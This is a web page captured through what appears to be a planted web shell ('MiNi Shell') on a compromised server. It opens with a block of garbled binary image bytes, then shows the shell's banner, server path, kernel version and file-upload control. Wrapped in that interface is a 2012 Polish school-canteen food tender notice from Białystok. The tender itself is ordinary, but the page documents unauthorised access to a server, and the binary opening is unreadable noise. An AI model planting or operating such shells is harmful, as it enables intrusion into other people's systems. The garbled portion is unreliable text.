JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120706/238666-N-2012.html

<p class="kh_header"><b>Białystok: Przetarg nieograniczony na dostawę mięsa, wędlin, drobiu oraz różnych artykułów spożywczych do stołówki szkolnej</b><br>
<b>Numer ogłoszenia: 238666 - 2012; data zamieszczenia: 06.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa nr 47 im. Jana Klemensa Branickiego , ul. Palmowa 28, 15-795 Białystok, woj. podlaskie, tel. 085 65 34 378, faks 085 65 31 981.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.smt.pl/sp47bial</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.smt.pl/sp47bial</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawę mięsa, wędlin, drobiu oraz różnych artykułów spożywczych do stołówki szkolnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy do Szkoły Podstawowej Nr 47 im. Jana Klemensa Branickiego w Białymstoku mięsa, wędlin, drobiu oraz różnych artykułów spożywczych do stołówki szkolnej:
Część I. mięso
 1.Łopatka b/k 2200 kg
 2.Schab z/k 900 kg
 3.Udziec wołowy b/k 300 kg
 4.Szynka wieprzowa b/k 600 kg
 5.Kiełbasa biała 300 kg
 6.Kości schabowe 400 kg
Część II. wędliny oraz drób
 1.Kiełbasa podwawelska 200 kg
 2.Udziec z kurczaka 900 kg
 3.Podudzie z kurczaka 300 kg
 4.Korpusy drobiowe 200 kg
 5.Filet indyczy 400 kg
Część III. Różne produkty spożywcze
1.Kwasek cyt. 500g typ kamis lub równoważny 6 szt
2.Cukier krzyształ 1kg 780 kg
3.Jogurt polski 250g 8300 szt
4.Jogurt naturalny 350g 24 szt
5.Smalec 200g 300 szt
6.Majonez 5 kg typu Mosso lub równoważny 28 szt
7.Ocet 10% 0,5l 80 szt
8.Masło polskie 200g extra 400 szt
9.Mleko 2% 1l 78 szt
10.Napój brzoskwinia 1kg 100 szt
11.Napój porzeczka 1kg 100 szt
12.Napój jabłko 1kg typ Alsa lub równoważny 100 szt
13.Napój malina 1 kg w opakowaniu 100 szt
14.Napój pomarańcz 1 kg w opakowaniu 100 szt
15.Napój wiśnia 1 kg w opakowaniu 100 szt
16.Olej 5l typu Bartek lub równoważny 70 szt
17.Rama Combi Profi typu Knorr lub równoważny 36 szt
18.Kasza jęczmienna 5kg w opakowaniu 58 op
19.Makaron kokardki 3kg w opakowaniu 60 op
20.Makaron kolanka 3kg w opakowaniu 51 op
21.Makaron nitka 3kg w opakowaniu 40 op
22.Makaron świderek 3kg w opakowaniu 112 op
23.Makaron wstążki 3kg w opakowaniu 39 op
24.Mąka tortowa typ 450 490 kg
25.Mąka ziemniaczana 1kg 16 kg
26.Mąka ziemniaczana 0,5 kg 20 szt
27.Ryż długoziarnisty 5kg 45 op
28.Brzoskwinie 4250g 12 szt
29.Fasola czerwona 2600g 6 szt
30.Koncentrat pom. 800g 170 szt
31.Kukurydza kon. 2500g 40 szt
32.Ogórek konserwowy 0,9kg w opakowaniu 450 szt
33.Sos słodko-kw. Łowicz 520g 270 szt
34.Szczaw 270g typu Mosso 50 szt
35.Baton twix, lion, snickers 43g lub równoważny 8000 szt
36.Sok fortuna 0,2l 1000 szt
37.Sól warzona 1kg 330 kg
38.Śmietana 18% 400g 2500 szt
39.Śmietana 30% 1l 40 szt
40.Twaróg krajanka 600 kg
41.Pierogi z serem 800g 300 op
42.Barszcz biały 5kg 5 szt
43.Barszcz czerwony 1kg 10 szt
44.Fix do gulaszu 1kg 7 szt
45.Liść laurowy 100g 6 szt
46.Majeranek 150g 6 szt
47.Papryka ostra 1kg 1 szt
48.Papryka słodka 1kg 1 szt
49.Pieprz czarny 1kg 6 szt
50.Pieprz ziołowy 0,9kg 3 szt
51.Przyprawa Delikat 600g do drobiu lub równoważny 16 szt
52.Przyprawa w płynie 1l 12 szt
53.Przyprawa do gulaszu 1kg 1 szt
54.Przyprawa uniwersalna 5kg 40 szt
55.Magi 1l 20 szt
56.Rosół drobiowy 0,9kg 25 szt
57.Sos do spagetti 0,9kg 7 szt
58.Sos piecza-borow. 0,9kg 16 szt
59.Sos pieczeniowy 0,9kg 9 szt
60.Sos sałatkowo ogr. 0,9kg 22 szt
61.Sos napoli 0,9kg 2 szt
62.Zasmażka jasna 1kg 65 szt
63.Ziele angielskie 600g 4 szt
64.Zupa krem 1kg 16 szt
65.Żurek-Koncentrat 3kg 12 szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wykonawca winien złożyć stosowne oświadczenie. Ocena spełniania warunków wymaganych od wykonawców dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów potwierdzających spełnienie warunków. Nie spełnienie chociażby jednego z wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wykonawca winien złożyć stosowne oświadczenie. Ocena spełniania warunków wymaganych od wykonawców dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów potwierdzających spełnienie warunków. Nie spełnienie chociażby jednego z wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wykonawca winien złożyć stosowne oświadczenie. Ocena spełniania warunków wymaganych od wykonawców dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów potwierdzających spełnienie warunków. Nie spełnienie chociażby jednego z wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wykonawca winien złożyć stosowne oświadczenie. Ocena spełniania warunków wymaganych od wykonawców dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów potwierdzających spełnienie warunków. Nie spełnienie chociażby jednego z wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wykonawca winien złożyć stosowne oświadczenie. Ocena spełniania warunków wymaganych od wykonawców dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów potwierdzających spełnienie warunków. Nie spełnienie chociażby jednego z wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę ceny oferty brutto, wyszczególnionej w §4 ust. 1 wzoru umowy, w przypadku zmiany ustawowej stawki podatku VAT na asortyment będący przedmiotem umowy. Powyższe może nastąpić na podstawie pisma Wykonawcy wskazującego podstawę prawną uzasadniającą dokonanie takiej zmiany. Zmiany umowy w zakresie, o którym mowa powyżej wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.smt.pl/sp47bial<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa Nr 47 im. Jana Klemensa Branickiego w Białymstoku
ul. Palmowa 28
15-795 Białystok
Pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2012 godzina 09:30, miejsce: Szkoła Podstawowa Nr 47 im. Jana Klemensa Branickiego w Białymstoku
ul. Palmowa 28
15-795 Białystok
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> mięso.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest asortyment wyszczególniony w poniższej tabeli.
L.p. Nazwa przedmiotu J.m Ilość
1.Łopatka b/k kg 2200
2.Schab z/k kg 900
3.Udziec wołowy b/k kg 300
4.Szynka wieprzowa b/k kg 600
5.Kiełbasa biała  kg 300
6.Kości schabowe kg 400
Wyroby muszą odpowiadać Polskim Normom. Dostarczane produkty muszą być świeże z terminem przydatności do spożycia według obowiązujących norm.
Oferowane wyroby powinny spełniać warunki sanitarne ich pozyskiwania, produkcji, przetwarzania, składowania, transportu oraz sprzedaży bezpośredniej.
Wyroby mają być dostarczane środkiem transportu dostosowanym do przewozu produktów spożywczych zgodnie z obowiązującymi przepisami prawa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wędliny oraz drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest asortyment wyszczególniony w poniższej tabeli.
L.p. Nazwa przedmiotu J.m Ilość
1.Kiełbasa podwawelska kg 200
2.Udziec z kurczaka kg 900
3.Podudzie z kurczaka kg 300
4.Korpusy drobiowe kg 200
5.Filet indyczy kg 400
Wyroby muszą odpowiadać Polskim Normom. Dostarczane produkty muszą być świeże z terminem przydatności do spożycia według obowiązujących norm.
Oferowane wyroby powinny spełniać warunki sanitarne ich pozyskiwania, produkcji, przetwarzania, składowania, transportu oraz sprzedaży bezpośredniej.
Wyroby mają być dostarczane środkiem transportu dostosowanym do przewozu produktów spożywczych zgodnie z obowiązującymi przepisami prawa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest asortyment wyszczególniony w poniższej tabeli.
L.p. Nazwa przedmiotu J.m Ilość
1.Kwasek cyt. 500g typ kamis lub równoważny szt 6
2.Cukier krzyształ 1kg kg 780
3.Jogurt polski 250g szt 8300
4.Jogurt naturalny 350g szt 24
5.Smalec 200g szt 300
6.Majonez 5 kg typu Mosso lub równoważny szt 28
7.Ocet 10% 0,5l szt 80
8.Masło polskie 200g extra szt 400
9.Mleko 2% 1l szt 78
10.Napój brzoskwinia 1kg szt 100
11.Napój porzeczka 1kg szt 100
12.Napój jabłko 1kg typ Alsa lub równoważny szt 100
13.Napój malina 1 kg w opakowaniu szt 100
14.Napój pomarańcz 1 kg w opakowaniu szt 100
15.Napój wiśnia 1 kg w opakowaniu szt 100
16.Olej 5l typu Bartek lub równoważny szt 70
17.Rama Combi Profi typu Knorr lub równoważny szt 36
18.Kasza jęczmienna 5kg w opakowaniu op 58
19.Makaron kokardki 3kg w opakowaniu op 60
20.Makaron kolanka 3kg w opakowaniu op 51
21.Makaron nitka 3kg w opakowaniu op 40
22.Makaron świderek 3kg w opakowaniu op 112
23.Makaron wstążki 3kg w opakowaniu op 39
24.Mąka tortowa typ 450 kg 490
25.Mąka ziemniaczana 1kg kg 16
26.Mąka ziemniaczana 0,5 kg szt 20
27.Ryż długoziarnisty 5kg op 45
28.Brzoskwinie 4250g szt 12
29.Fasola czerwona 2600g szt 6
30.Koncentrat pom. 800g szt 170
31.Kukurydza kon. 2500g szt 40
32.Ogórek konserwowy 0,9kg w opakowaniu szt 450
33.Sos słodko-kw. Łowicz 520g szt 270
34.Szczaw 270g typu Mosso szt 50
35.Baton twix, lion, snickers 43g lub równoważny szt 8000
36.Sok fortuna 0,2l szt 1000
37.Sól warzona 1kg kg 330
38.Śmietana 18% 400g szt 2500
39.Śmietana 30% 1l szt 40
40.Twaróg krajanka kg 600
41.Pierogi z serem 800g op 300
42.Barszcz biały 5kg szt 5
43.Barszcz czerwony 1kg szt 10
44.Fix do gulaszu 1kg szt 7
45.Liść laurowy 100g szt 6
46.Majeranek 150g szt 6
47.Papryka ostra 1kg szt 1
48.Papryka słodka 1kg szt 1
49.Pieprz czarny 1kg szt 6
50.Pieprz ziołowy 0,9kg szt 3
51.Przyprawa Delikat 600g do drobiu lub równoważny szt 16
52.Przyprawa w płynie 1l szt 12
53.Przyprawa do gulaszu 1kg szt 1
54.Przyprawa uniwersalna 5kg szt 40
55.Magi 1l szt 20
56.Rosół drobiowy 0,9kg szt 25
57.Sos do spagetti 0,9kg szt 7
58.Sos piecza-borow. 0,9kg szt 16
59.Sos pieczeniowy 0,9kg szt 9
60.Sos sałatkowo ogr. 0,9kg szt 22
61.Sos napoli 0,9kg szt 2
62.Zasmażka jasna 1kg szt 65
63.Ziele angielskie 600g szt 4
64.Zupa krem 1kg szt 16
65.Żurek-Koncentrat 3kg szt 12
Wyroby muszą odpowiadać Polskim Normom. Dostarczane produkty muszą być świeże z terminem przydatności do spożycia według obowiązujących norm.
Oferowane wyroby powinny spełniać warunki sanitarne ich pozyskiwania, produkcji, przetwarzania, składowania, transportu oraz sprzedaży bezpośredniej.
Wyroby mają być dostarczane środkiem transportu dostosowanym do przewozu produktów spożywczych zgodnie z obowiązującymi przepisami prawa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com